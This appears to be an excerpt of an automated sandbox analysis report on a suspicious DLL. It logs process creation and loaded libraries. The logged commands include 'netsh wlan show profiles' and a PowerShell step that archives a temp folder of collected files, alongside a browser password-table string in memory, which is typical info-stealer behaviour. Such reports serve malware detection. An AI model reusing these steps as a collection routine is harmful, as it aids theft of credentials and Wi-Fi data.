    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1933821234.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2006335358.0000000002A7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: 0j6nSbUQQS.dllReversingLabs: Detection: 55%
    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll"
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Save
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Main
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Save
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,MainJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,SaveJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",MainJump to behavior
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",SaveJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
